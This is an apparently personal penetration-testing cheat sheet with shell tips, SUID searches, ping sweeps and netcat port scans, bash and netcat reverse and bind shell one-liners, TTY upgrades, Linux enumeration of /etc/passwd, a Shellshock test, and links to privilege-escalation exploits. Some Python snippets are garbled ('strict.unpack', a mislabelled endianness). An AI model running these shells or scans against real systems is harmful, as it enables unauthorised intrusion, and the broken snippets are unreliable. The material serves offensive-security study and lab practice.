Shell and Linux / UNIX

shell / bash reference

tee – send stdin to output file -a to append

File search

find / -iname sdb* -exec {} \; – find files and execute command on the results
cut -d”/“ -f3 – cut on the delimiter “/“ and the 3rd field
find / -perm -4000 -print – Find all SUID files
find / -perm -4000 -exec ls -l {} \;
find / -perm -2000 -print – Find all SGID files
find / -perm -2 ! -type l -ls 2>/dev/null – find world writeable files

Scripting

$1 first argument of script

for script

for name in $(cat filesname.txt); do
    some commands with $name variable 
done

IFS – Line seperator
export IFS=$'\n' – loop onm line

Ping Sweep – for i in $(seq 1 254); do ping -c 1 10.11.1.$i; done
Port Scan – for i in $(cat portlist.txt); do nc -nv -w1 -z 10.11.1.8 $i; done

if

if [-z “$1”]; then  #if exists value in variable $1
    some commands
fi

redirect StdErr to StdOut

2>&1
command 2> /dev/null – Ignore stderr

Rsverse Shells

revserse shell (bash – linux)

bash -i >& /dev/tcp/192.168.30.5/443 0>&1
bash -c 'echo 1> /dev/tcp/x.x.x.x/x && echo open || echo false' – check to see a port is open

Netcat

• client mode – nc -nv 127.0.0.1 25
• Server mode – nc -nlvp 4444
• Server run command when connecting to port (bind shell) – nc -lvp 4444 -e cmd.exe
• port scan – nc -nvv -w -l -z $ipaddress $startport-$endport
• UDP – -u argument

reverse shell

• setup netcat server (listener)
• nc -nv 127.0.0.1 25 -e /bin/sh – connect client to server

ncat

• encrypted netcat rewrite
• bind shell – ncat -lvp 4444 -e cmd.exe —allow 192.168.4.4 —ssl
• client – ncat -v 192.168.3.2 4444 —ssl

Fixing the Shell

• use python pty
• Set TERM=xterm-color
• background reverse shell run stty raw -echo

fix shell script – linux

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color
stty rows 50 cols 132

tcpdump

-A – Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.

Python Reference

Python TTY – python -c 'import pty;pty.spawn("/bin/bash")'
Python Web server – python -m SimpleHTTPServer 8000

HEX conversion

import struct
hex(strict.unpack("I", "VALUE")[0])     # native order
hex(strict.unpack(">I", "VALUE")[0])    # big endian
hex(strict.unpack("<I", "VALUE")[0])    # big endian
struct.pack("I", 0x2323323)             # convert to binary string

python ftp server

# Install pyftpdlib
pip install pyftpdlib

# Run (-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -w

Enumeration

Basic Linux Privilege Escalation
Penetration Testing Methodology – 0DAYsecurity.com

• What’s the OS? What version? What architecture?
  cat /etc/*-release
uname -i
lsb_release -a (Debian based OSs)

• Who are we? Where are we?
  id
pwd

• Who uses the box? What users? (And which ones have a valid shell)
  cat /etc/passwd
grep -vE "nologin|false" /etc/passwd

• What’s currently running on the box? What active network services are there?
  ps aux
netstat -antup

• What’s installed? What kernel is being used?
  dpkg -l (Debian based OSs)
  rpm -qa (CentOS / openSUSE )
  uname -a

Exploits

Shell Shock

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

• GitHub – mubix/shellshocker-pocs: Collection of Proof of Concepts and Potential Targets for #ShellShocker

mysql

NFS

showmount -e IP – list exports
showmount -a IP – list all mount points
mount -f nfs -o vers=3 IP:SHARE DIR – mount NFS share

• you can set a local user to match user/group
• export settings
  • "root_squash" – map root user to nobody
  • "no_all_squash" – blocks mapping of other UID to nobody

links

• https://github.com/SecWiki/linux-kernel-exploits

• SambaCry RCE exploit for Samba 4.5.9

• Exploit for Samba vulnerabilty (CVE-2015-0240)

• PoCs · dirtycow/dirtycow.github.io Wiki · GitHub

• GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

• Basic Linux Privilege Escalation